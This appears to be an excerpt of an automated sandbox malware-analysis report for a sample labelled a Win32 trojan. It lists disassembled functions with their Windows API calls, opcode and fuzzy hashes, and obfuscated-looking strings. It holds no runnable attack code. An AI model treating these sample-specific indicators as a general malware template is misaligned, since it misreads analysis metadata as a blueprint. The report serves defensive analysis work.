      • Opcode ID: b9e51209788341144b915545fe5dfbe7f5a8d9ffc83865075b50555ad746131a
      • Instruction ID: 0488cab39119d8de557b3b4806ac3c9a9635cd93762780cbdaa848047cb119db
      • Opcode Fuzzy Hash: b9e51209788341144b915545fe5dfbe7f5a8d9ffc83865075b50555ad746131a
      • Instruction Fuzzy Hash: AFC19F75D042588FCF14CFE9C9809EEBBB5AF49314F28816AE855FB242D2319D42DFA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • Sleep.KERNEL32(00000000), ref: 005A7DC6
      • lstrcmpA.KERNEL32(00000000,INIT), ref: 005A7DD3
      • StrToIntA.SHLWAPI(00000000), ref: 005A7E96
      • GetTickCount64.KERNEL32 ref: 005A829B
        • Part of subcall function 005A55E0: GetProcessHeap.KERNEL32(00000008,00000001,005A7E5E,00000001,00000000), ref: 005A55E3
        • Part of subcall function 005A55E0: HeapAlloc.KERNEL32(00000000), ref: 005A55EA
      • StrToIntA.SHLWAPI(00000000), ref: 005A8194
      • StrToIntA.SHLWAPI(?), ref: 005A819D
      • CreateThread.KERNEL32(00000000,00000000,Function_00007290,00000000,00000000,00000000), ref: 005A81B1
      • CloseHandle.KERNEL32(00000000), ref: 005A81BC
        • Part of subcall function 005A5600: GetProcessHeap.KERNEL32(00000000,00000000,005A82E5), ref: 005A5607
        • Part of subcall function 005A5600: HeapFree.KERNEL32(00000000), ref: 005A560E
      • Sleep.KERNEL32(00000000), ref: 005A82F6
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
      • String ID:
      • API String ID: 1253608127-0
      • Opcode ID: 35bf6b39b4bc331c765d80d00a0e527b3f0c1b729249b0d58964d4e8477f3ee0
      • Instruction ID: c88671c1d79a1792a61cef0b9fec11d061d23a68a25863b5f68ecd81f5ca4500
      • Opcode Fuzzy Hash: 35bf6b39b4bc331c765d80d00a0e527b3f0c1b729249b0d58964d4e8477f3ee0
      • Instruction Fuzzy Hash: 2F21E531E0060A97DB24ABB0DC5AB7F7F78BF86700F404429E912A7281EF3499048791
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLastError.KERNEL32(?,?,00FB509B,00FB4C89,00FB43FF), ref: 00FB50B2
      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FB50C0
      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FB50D9
      • SetLastError.KERNEL32(00000000,00FB509B,00FB4C89,00FB43FF), ref: 00FB512B
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ErrorLastValue___vcrt_
      • String ID:
      • API String ID: 3852720340-0
      • Opcode ID: e90f611f1c7a1873bd341bcf3aabc9d2566db4505c6de8633a764ce5594b54d4
      • Instruction ID: 928a8aab3c21a39c626e32d1fa6083c9acf987231a9f23598fa88b148d2c9471
      • Opcode Fuzzy Hash: e90f611f1c7a1873bd341bcf3aabc9d2566db4505c6de8633a764ce5594b54d4
      • Instruction Fuzzy Hash: 0E012833909B155DBF20377B6D87BD63A54EB15BB0B30022AF510820F1EE9D4C167D40
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080
      • task.LIBCPMTD ref: 00FB1C63
      • task.LIBCPMTD ref: 00FB1C72
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traits
      • String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
      • API String ID: 1455298312-2259853572
      • Opcode ID: 1834f5ff2e7b4ca5459608ee20fd20749887bd5cf89333e5ed9bf43be57f008a
      • Instruction ID: b0c5857cc3f5e13936d739adecf783c89edc8770267b27a125cbae7db5b427dc
      • Opcode Fuzzy Hash: 1834f5ff2e7b4ca5459608ee20fd20749887bd5cf89333e5ed9bf43be57f008a
      • Instruction Fuzzy Hash: 16415BB1D4420CDBCB14DFA9D9A5BEDBBB0FF04754F604119E412A7280DB78AA44EF91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      • * , xrefs: 00FB2022
      • zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00FB2029
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traits
      • String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
      • API String ID: 1455298312-2972419988
      • Opcode ID: 13144cb22c7f088a5a6788d5d97b0e1590ec51d33d77da933f4e101960e0237b
      • Instruction ID: a27d74809f980cd8ceaccfbf5b008f2261f06e8785172db90842b9c5834a2cfd
      • Opcode Fuzzy Hash: 13144cb22c7f088a5a6788d5d97b0e1590ec51d33d77da933f4e101960e0237b
      • Instruction Fuzzy Hash: 25115B7194464CDACB04EFA4DD55BEDFBB4EF08714F108219E821672D1EF395609DB50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00FB75D9,?,?,00FB75A1,?,?,?), ref: 00FB763C
      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FB764F
      • FreeLibrary.KERNEL32(00000000,?,?,00FB75D9,?,?,00FB75A1,?,?,?), ref: 00FB7672
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressFreeHandleLibraryModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 4061214504-1276376045
      • Opcode ID: bb1e2ae48ae925fef16319945a4100053455ef16fc1813f3a155f822b43b1a6f
      • Instruction ID: 9c456bf619d1c3b9acbdd22ab7c529ccd00dec6146102a77e8500f4200ca76bc
      • Opcode Fuzzy Hash: bb1e2ae48ae925fef16319945a4100053455ef16fc1813f3a155f822b43b1a6f
      • Instruction Fuzzy Hash: B7F05E31941719BBCB11AB55DE0AFDE7B79FB41796F000154E901A21A1CB70CE10FE95
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • _free.LIBCMT ref: 00FB9D45
        • Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
        • Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA
      • _free.LIBCMT ref: 00FB9D57
      • _free.LIBCMT ref: 00FB9D69
      • _free.LIBCMT ref: 00FB9D7B
      • _free.LIBCMT ref: 00FB9D8D
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: _free$ErrorFreeHeapLast
      • String ID:
      • API String ID: 776569668-0
      • Opcode ID: 7d37f5a9740c51d8e5b4719ac0f4aaa88d4a100d74382cc07b0da613e4bc0a18
      • Instruction ID: 08a39970847d571175de5de5ea9a1f5d42c7029406349618b694c565436737b1
      • Opcode Fuzzy Hash: 7d37f5a9740c51d8e5b4719ac0f4aaa88d4a100d74382cc07b0da613e4bc0a18
      • Instruction Fuzzy Hash: ECF0623280C304678630FB6BE982CAAB3E9AB843603644805F584D7700CB74FCC17EB4
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
      • API String ID: 0-1364279115
      • Opcode ID: 0f769458a007173763f78a7ea07ba869c5870bb92a0ee20393c444383f2bba0c
      • Instruction ID: 6a12319349e841c71a7dfebc2788e678581b3556846ef8972332dd88474030f2
      • Opcode Fuzzy Hash: 0f769458a007173763f78a7ea07ba869c5870bb92a0ee20393c444383f2bba0c
      • Instruction Fuzzy Hash: DF31B375E04219ABCB21DF9BDD8ADEEBBB8EB85710B14006AF400D7251E7789E40EF50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FB6163,00000000,?,00FC8D08,?,?,?,00FB6306,00000004,InitializeCriticalSectionEx,00FC1C98,InitializeCriticalSectionEx), ref: 00FB61BF
      • GetLastError.KERNEL32(?,00FB6163,00000000,?,00FC8D08,?,?,?,00FB6306,00000004,InitializeCriticalSectionEx,00FC1C98,InitializeCriticalSectionEx,00000000,?,00FB60BD), ref: 00FB61C9
      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FB61F1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: LibraryLoad$ErrorLast
      • String ID: api-ms-
      • API String ID: 3177248105-2084034818
      • Opcode ID: 4e5312344d00a7f6689706f7eea742bde06267676cebfd0f2967d7f0abdf5199
      • Instruction ID: 5d9bea1f93392b2189f3e20af90cf70b191390bfac36db94132c327e01834c86
      • Opcode Fuzzy Hash: 4e5312344d00a7f6689706f7eea742bde06267676cebfd0f2967d7f0abdf5199
      • Instruction Fuzzy Hash: DAE012346C0209B6EB202F61DE07F993B55AB11B50F104430FA0DE40E3DB65D961B995
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: AdjustPointer
      • String ID:
      • API String ID: 1740715915-0
      • Opcode ID: 31279f5d4e8b80a7900e300d03162a17dd5e4096c86e13f4d53b282e5a24d0ba
      • Instruction ID: d7c38ffd9322e8f1ab925645fbbecf180162d4ddb6f39d3bd334d0ec6b5cbc28
      • Opcode Fuzzy Hash: 31279f5d4e8b80a7900e300d03162a17dd5e4096c86e13f4d53b282e5a24d0ba
      • Instruction Fuzzy Hash: 7351E272A02B029FDB299F56D941BEA77A4FF44B20F24412DEC0157292E739EC41EF90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLastError.KERNEL32(?,?,?,00FBC440,?,00000001,00FBAD76,?,00FBC8FA,00000001,?,?,?,00FBAD05,?,?), ref: 00FB832F
      • _free.LIBCMT ref: 00FB838C
      • _free.LIBCMT ref: 00FB83C2
      • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00FBC8FA,00000001,?,?,?,00FBAD05,?,?,?,00FC7520,0000002C,00FBAD76), ref: 00FB83CD
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ErrorLast_free
      • String ID:
      • API String ID: 2283115069-0
      • Opcode ID: 349cccf488958607a55af01c0f3c404774101a974b15890331eee5795f4d7c28
      • Instruction ID: 168832d4c2f80d0cf6e522a003740a5f8c015b637d6f5388fbed55e0763c3d2a
      • Opcode Fuzzy Hash: 349cccf488958607a55af01c0f3c404774101a974b15890331eee5795f4d7c28
      • Instruction Fuzzy Hash: D811A3B2A442456AD71136779C86EEB379EABC1BF4B2C0624F611831D2DD358C0BFE25
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLastError.KERNEL32(?,00FB11AD,?,00FB8822,00FB85BF,?,?,00FB11AD,?), ref: 00FB8486
      • _free.LIBCMT ref: 00FB84E3
      • _free.LIBCMT ref: 00FB8519
      • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00FB11AD,?,00FB8822,00FB85BF,?,?,00FB11AD,?), ref: 00FB8524
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ErrorLast_free
      • String ID:
      • API String ID: 2283115069-0
      • Opcode ID: 65957def8f4644fb39270c28aa35a740cde0edd3f4350f7c8baf3b7b1fb8150f
      • Instruction ID: fc488cbf0180f6215802447a75b2b729e6baaa50454225e17487c1b6dab6a534
      • Opcode Fuzzy Hash: 65957def8f4644fb39270c28aa35a740cde0edd3f4350f7c8baf3b7b1fb8150f
      • Instruction Fuzzy Hash: 95112972A442056AD72177779C86FEB371E9BC13F0B280624F511831D2DE748C07BE20
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001), ref: 00FBD4ED
      • GetLastError.KERNEL32(?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?,00000001,?,00FBC91B,00FBAD05), ref: 00FBD4F9
        • Part of subcall function 00FBD4BF: CloseHandle.KERNEL32(FFFFFFFE,00FBD509,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?,00000001), ref: 00FBD4CF
      • ___initconout.LIBCMT ref: 00FBD509
        • Part of subcall function 00FBD481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FBD4B0,00FBCF22,00000001,?,00FBC3CF,?,?,00000001,?), ref: 00FBD494
      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00FBCF35,?,00000001,?,00000001,?,00FBC3CF,?,?,00000001,?), ref: 00FBD51E
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
      • String ID:
      • API String ID: 2744216297-0
      • Opcode ID: 02569884d7f7c41d1f7e186d21e3615c58424f05d93aab88a85363c6ff64c82c
      • Instruction ID: 18da983d201c42786e488f86c176916fa118c9af9ffa45a95c20225b45ba5234
      • Opcode Fuzzy Hash: 02569884d7f7c41d1f7e186d21e3615c58424f05d93aab88a85363c6ff64c82c
      • Instruction Fuzzy Hash: BDF01C3684116CBBCF222F92DD05EC93F66FB493F0B444010FA1896121DA32C860FB91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • _free.LIBCMT ref: 00FB7C74
        • Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
        • Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA
      • _free.LIBCMT ref: 00FB7C87
      • _free.LIBCMT ref: 00FB7C98
      • _free.LIBCMT ref: 00FB7CA9
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: _free$ErrorFreeHeapLast
      • String ID:
      • API String ID: 776569668-0
      • Opcode ID: 9090e076cc2a2df8ee6761bb93cd9720b0417d243ae7519fc509f1741505899e
      • Instruction ID: b492fc238a199ccbcba406ee819d4cf2174a2d516391e9b92d241d247ac26a03
      • Opcode Fuzzy Hash: 9090e076cc2a2df8ee6761bb93cd9720b0417d243ae7519fc509f1741505899e
      • Instruction Fuzzy Hash: A3E04F7480C66CDA8712BF21BE4FCD57B25A7847107468086F80003331C6B90693FFE4
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FB57A5
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: EncodePointer
      • String ID: MOC$RCC
      • API String ID: 2118026453-2084237596
      • Opcode ID: 36f9df18eb4d1d079b02131d7fd41de143a751dc63633793e9658a11de796436
      • Instruction ID: f9d2cae5a95566352a3b9d0ef99020c0e61025de858bd96d96bfd6230d44a254
      • Opcode Fuzzy Hash: 36f9df18eb4d1d079b02131d7fd41de143a751dc63633793e9658a11de796436
      • Instruction Fuzzy Hash: 76416631900609EFCF16DFA9CD81AEEBBB5BF48710F188059F905A6221D339D951EF50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(kernel32), ref: 00FB111B
      • GetModuleHandleW.KERNEL32(00000000), ref: 00FB1162
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HandleModule
      • String ID: kernel32
      • API String ID: 4139908857-541877477
      • Opcode ID: 07ea15b4c209ff5b672ea0b20710078bd511dab8feac55a0c98cc5b2e3e5864c
      • Instruction ID: 0e26fc62c92bb7a0b5f58392c106ba05fd72eb3ea755d7411f69f6219bb3e6e6
      • Opcode Fuzzy Hash: 07ea15b4c209ff5b672ea0b20710078bd511dab8feac55a0c98cc5b2e3e5864c
      • Instruction Fuzzy Hash: 3021F7B5E0020CEBCB04DFE5DD45AEEBBB4BF48300F108558E905A7240E7389A40DF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080
      • task.LIBCPMTD ref: 00FB2AB3
      • task.LIBCPMTD ref: 00FB2AC2
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traits
      • String ID: dboupzalsfzwvwpyqdpu
      • API String ID: 1455298312-2047172133
      • Opcode ID: bd1306977d97fadb83d80f16569a9a57e7677dbd046c4b4c3ffd7bd8b9f4e107
      • Instruction ID: 7540f884c14613ef2e721e9b3533d5944d05101f63c5a50330f86286fa85b6ae
      • Opcode Fuzzy Hash: bd1306977d97fadb83d80f16569a9a57e7677dbd046c4b4c3ffd7bd8b9f4e107
      • Instruction Fuzzy Hash: A8016971944249EBCB00EF58DD42BDEBBB4FB04764F004669E820A73C0DB79AB04DB80
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080
      • task.LIBCPMTD ref: 00FB2A43
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: char_traitstask
      • String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
      • API String ID: 3039116899-104439280
      • Opcode ID: 5cff5fccbd655541b24092ccbeaea5c6c8e68940bb7dc6242e112fa5366992fc
      • Instruction ID: 97159203bb6b12d82f870c06bd6507578ea295aa3e9d74b21a34e6be0d2371b6
      • Opcode Fuzzy Hash: 5cff5fccbd655541b24092ccbeaea5c6c8e68940bb7dc6242e112fa5366992fc
      • Instruction Fuzzy Hash: 7EF0F970D442088ADB14EFAADA557EEB7B4AF08704F604069D402B7281DB799E08EF59
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00FB9713: GetEnvironmentStringsW.KERNEL32 ref: 00FB9717
      • _free.LIBCMT ref: 00FB715E
      • _free.LIBCMT ref: 00FB7165
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
